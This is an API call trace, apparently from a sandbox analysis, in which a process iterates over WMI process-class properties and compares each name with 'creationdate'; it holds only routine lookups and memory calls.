[0401.590] lstrlenW (lpString="creationdate") returned 12
[0401.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherTransferCount", cchCount2=18) returned 1
[0401.590] free (_Block=0x209680)
[0401.590] IUnknown:Release (This=0x331310) returned 0x1
[0401.590] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.590] malloc (_Size=0x18) returned 0x209680
[0401.590] IWbemClassObject:Get (in: This=0x3315c0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.590] free (_Block=0x209680)
[0401.590] malloc (_Size=0x18) returned 0x209680
[0401.591] IWbemClassObject:Get (in: This=0x3315c0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.591] free (_Block=0x209680)
[0401.591] malloc (_Size=0x18) returned 0x209680
[0401.591] lstrlenW (lpString="PageFaults") returned 10
[0401.591] lstrlenW (lpString="creationdate") returned 12
[0401.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFaults", cchCount2=10) returned 1
[0401.591] free (_Block=0x209680)
[0401.591] IUnknown:Release (This=0x3315c0) returned 0x1
[0401.591] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.591] malloc (_Size=0x18) returned 0x209680
[0401.591] IWbemClassObject:Get (in: This=0x331870, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.591] free (_Block=0x209680)
[0401.592] malloc (_Size=0x18) returned 0x209680
[0401.592] IWbemClassObject:Get (in: This=0x331870, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.592] free (_Block=0x209680)
[0401.592] malloc (_Size=0x18) returned 0x209680
[0401.592] lstrlenW (lpString="PageFileUsage") returned 13
[0401.592] lstrlenW (lpString="creationdate") returned 12
[0401.592] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFileUsage", cchCount2=13) returned 1
[0401.592] free (_Block=0x209680)
[0401.592] IUnknown:Release (This=0x331870) returned 0x1
[0401.592] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.592] malloc (_Size=0x18) returned 0x209680
[0401.592] IWbemClassObject:Get (in: This=0x331b20, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.593] free (_Block=0x209680)
[0401.593] malloc (_Size=0x18) returned 0x209680
[0401.593] IWbemClassObject:Get (in: This=0x331b20, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.593] free (_Block=0x209680)
[0401.593] malloc (_Size=0x18) returned 0x209680
[0401.593] lstrlenW (lpString="ParentProcessId") returned 15
[0401.593] lstrlenW (lpString="creationdate") returned 12
[0401.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ParentProcessId", cchCount2=15) returned 1
[0401.593] free (_Block=0x209680)
[0401.593] IUnknown:Release (This=0x331b20) returned 0x1
[0401.593] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.593] malloc (_Size=0x18) returned 0x209680
[0401.594] IWbemClassObject:Get (in: This=0x331dd0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.594] free (_Block=0x209680)
[0401.594] malloc (_Size=0x18) returned 0x209680
[0401.594] IWbemClassObject:Get (in: This=0x331dd0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.594] free (_Block=0x209680)
[0401.594] malloc (_Size=0x18) returned 0x209680
[0401.594] lstrlenW (lpString="PeakPageFileUsage") returned 17
[0401.594] lstrlenW (lpString="creationdate") returned 12
[0401.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakPageFileUsage", cchCount2=17) returned 1
[0401.594] free (_Block=0x209680)
[0401.595] IUnknown:Release (This=0x331dd0) returned 0x1
[0401.595] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.595] malloc (_Size=0x18) returned 0x209680
[0401.595] IWbemClassObject:Get (in: This=0x332080, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.595] free (_Block=0x209680)
[0401.595] malloc (_Size=0x18) returned 0x209680
[0401.595] IWbemClassObject:Get (in: This=0x332080, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.595] free (_Block=0x209680)
[0401.595] malloc (_Size=0x18) returned 0x209680
[0401.595] lstrlenW (lpString="PeakVirtualSize") returned 15
[0401.595] lstrlenW (lpString="creationdate") returned 12
[0401.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakVirtualSize", cchCount2=15) returned 1
[0401.596] free (_Block=0x209680)
[0401.596] IUnknown:Release (This=0x332080) returned 0x1
[0401.596] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.596] malloc (_Size=0x18) returned 0x209680
[0401.596] IWbemClassObject:Get (in: This=0x332330, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.596] free (_Block=0x209680)
[0401.596] malloc (_Size=0x18) returned 0x209680
[0401.596] IWbemClassObject:Get (in: This=0x332330, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.596] free (_Block=0x209680)
[0401.596] malloc (_Size=0x18) returned 0x209680
[0401.597] lstrlenW (lpString="PeakWorkingSetSize") returned 18
[0401.597] lstrlenW (lpString="creationdate") returned 12
[0401.597] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakWorkingSetSize", cchCount2=18) returned 1
[0401.597] free (_Block=0x209680)
[0401.597] IUnknown:Release (This=0x332330) returned 0x1
[0401.597] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.597] malloc (_Size=0x18) returned 0x209680
[0401.597] IWbemClassObject:Get (in: This=0x3325e0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.597] free (_Block=0x209680)
[0401.597] malloc (_Size=0x18) returned 0x209680
[0401.597] IWbemClassObject:Get (in: This=0x3325e0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.598] free (_Block=0x209680)
[0401.598] malloc (_Size=0x18) returned 0x209680
[0401.598] lstrlenW (lpString="Priority") returned 8
[0401.598] lstrlenW (lpString="creationdate") returned 12
[0401.598] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Priority", cchCount2=8) returned 1
[0401.598] free (_Block=0x209680)
[0401.598] IUnknown:Release (This=0x3325e0) returned 0x1
[0401.598] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.598] malloc (_Size=0x18) returned 0x209680
[0401.598] IWbemClassObject:Get (in: This=0x332890, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.598] free (_Block=0x209680)
[0401.599] malloc (_Size=0x18) returned 0x209680
[0401.599] IWbemClassObject:Get (in: This=0x332890, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.599] free (_Block=0x209680)
[0401.599] malloc (_Size=0x18) returned 0x209680
[0401.599] lstrlenW (lpString="PrivatePageCount") returned 16
[0401.599] lstrlenW (lpString="creationdate") returned 12
[0401.599] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PrivatePageCount", cchCount2=16) returned 1
[0401.599] free (_Block=0x209680)
[0401.599] IUnknown:Release (This=0x332890) returned 0x1
[0401.599] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.599] malloc (_Size=0x18) returned 0x209680
[0401.600] IWbemClassObject:Get (in: This=0x332b40, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.600] free (_Block=0x209680)
[0401.600] malloc (_Size=0x18) returned 0x209680
[0401.600] IWbemClassObject:Get (in: This=0x332b40, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.600] free (_Block=0x209680)
[0401.600] malloc (_Size=0x18) returned 0x209680
[0401.600] lstrlenW (lpString="ProcessId") returned 9
[0401.600] lstrlenW (lpString="creationdate") returned 12
[0401.600] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ProcessId", cchCount2=9) returned 1
[0401.600] free (_Block=0x209680)
[0401.600] IUnknown:Release (This=0x332b40) returned 0x1
[0401.600] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.601] malloc (_Size=0x18) returned 0x209680
[0401.601] IWbemClassObject:Get (in: This=0x332df0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.601] free (_Block=0x209680)
[0401.601] malloc (_Size=0x18) returned 0x209680
[0401.601] IWbemClassObject:Get (in: This=0x332df0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.601] free (_Block=0x209680)
[0401.601] malloc (_Size=0x18) returned 0x209680
[0401.601] lstrlenW (lpString="QuotaNonPagedPoolUsage") returned 22
[0401.601] lstrlenW (lpString="creationdate") returned 12
[0401.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaNonPagedPoolUsage", cchCount2=22) returned 1
[0401.602] free (_Block=0x209680)
[0401.602] IUnknown:Release (This=0x332df0) returned 0x1
[0401.602] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.602] malloc (_Size=0x18) returned 0x209680
[0401.602] IWbemClassObject:Get (in: This=0x3330a0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.602] free (_Block=0x209680)
[0401.602] malloc (_Size=0x18) returned 0x209680
[0401.602] IWbemClassObject:Get (in: This=0x3330a0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.603] free (_Block=0x209680)
[0401.603] malloc (_Size=0x18) returned 0x209680
[0401.603] lstrlenW (lpString="QuotaPagedPoolUsage") returned 19
[0401.603] lstrlenW (lpString="creationdate") returned 12
[0401.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPagedPoolUsage", cchCount2=19) returned 1
[0401.603] free (_Block=0x209680)
[0401.603] IUnknown:Release (This=0x3330a0) returned 0x1
[0401.603] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.603] malloc (_Size=0x18) returned 0x209680
[0401.603] IWbemClassObject:Get (in: This=0x333350, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.603] free (_Block=0x209680)
[0401.604] malloc (_Size=0x18) returned 0x209680
[0401.604] IWbemClassObject:Get (in: This=0x333350, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.604] free (_Block=0x209680)
[0401.604] malloc (_Size=0x18) returned 0x209680
[0401.604] lstrlenW (lpString="QuotaPeakNonPagedPoolUsage") returned 26
[0401.604] lstrlenW (lpString="creationdate") returned 12
[0401.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakNonPagedPoolUsage", cchCount2=26) returned 1
[0401.604] free (_Block=0x209680)
[0401.604] IUnknown:Release (This=0x333350) returned 0x1
[0401.604] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.604] malloc (_Size=0x18) returned 0x209680
[0401.605] IWbemClassObject:Get (in: This=0x333600, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.605] free (_Block=0x209680)
[0401.605] malloc (_Size=0x18) returned 0x209680
[0401.605] IWbemClassObject:Get (in: This=0x333600, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.605] free (_Block=0x209680)
[0401.605] malloc (_Size=0x18) returned 0x209680
[0401.605] lstrlenW (lpString="QuotaPeakPagedPoolUsage") returned 23
[0401.605] lstrlenW (lpString="creationdate") returned 12
[0401.605] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakPagedPoolUsage", cchCount2=23) returned 1
[0401.605] free (_Block=0x209680)
[0401.605] IUnknown:Release (This=0x333600) returned 0x1
[0401.606] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.606] malloc (_Size=0x18) returned 0x209680
[0401.606] IWbemClassObject:Get (in: This=0x3338b0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.606] free (_Block=0x209680)
[0401.606] malloc (_Size=0x18) returned 0x209680
[0401.606] IWbemClassObject:Get (in: This=0x3338b0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.606] free (_Block=0x209680)
[0401.606] malloc (_Size=0x18) returned 0x209680
[0401.606] lstrlenW (lpString="ReadOperationCount") returned 18
[0401.606] lstrlenW (lpString="creationdate") returned 12
[0401.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadOperationCount", cchCount2=18) returned 1
[0401.606] free (_Block=0x209680)
[0401.607] IUnknown:Release (This=0x3338b0) returned 0x1
[0401.607] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.607] malloc (_Size=0x18) returned 0x209680
[0401.607] IWbemClassObject:Get (in: This=0x333b60, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.607] free (_Block=0x209680)
[0401.607] malloc (_Size=0x18) returned 0x209680
[0401.607] IWbemClassObject:Get (in: This=0x333b60, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.607] free (_Block=0x209680)
[0401.607] malloc (_Size=0x18) returned 0x209680
[0401.607] lstrlenW (lpString="ReadTransferCount") returned 17
[0401.607] lstrlenW (lpString="creationdate") returned 12
[0401.608] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadTransferCount", cchCount2=17) returned 1
[0401.608] free (_Block=0x209680)
[0401.608] IUnknown:Release (This=0x333b60) returned 0x1
[0401.608] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.608] malloc (_Size=0x18) returned 0x209680
[0401.608] IWbemClassObject:Get (in: This=0x333e10, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.608] free (_Block=0x209680)
[0401.608] malloc (_Size=0x18) returned 0x209680
[0401.608] IWbemClassObject:Get (in: This=0x333e10, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.608] free (_Block=0x209680)
[0401.608] malloc (_Size=0x18) returned 0x209680
[0401.609] lstrlenW (lpString="SessionId") returned 9
[0401.609] lstrlenW (lpString="creationdate") returned 12
[0401.609] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="SessionId", cchCount2=9) returned 1
[0401.609] free (_Block=0x209680)
[0401.609] IUnknown:Release (This=0x333e10) returned 0x1
[0401.609] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.609] malloc (_Size=0x18) returned 0x209680
[0401.609] IWbemClassObject:Get (in: This=0x338df0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.609] free (_Block=0x209680)
[0401.609] malloc (_Size=0x18) returned 0x209680
[0401.609] IWbemClassObject:Get (in: This=0x338df0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.609] free (_Block=0x209680)
[0401.610] malloc (_Size=0x18) returned 0x209680
[0401.610] lstrlenW (lpString="Status") returned 6
[0401.610] lstrlenW (lpString="creationdate") returned 12
[0401.610] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Status", cchCount2=6) returned 1
[0401.610] free (_Block=0x209680)
[0401.610] IUnknown:Release (This=0x338df0) returned 0x1
[0401.610] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.610] malloc (_Size=0x18) returned 0x209680
[0401.610] IWbemClassObject:Get (in: This=0x3390a0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.610] free (_Block=0x209680)
[0401.610] malloc (_Size=0x18) returned 0x209680
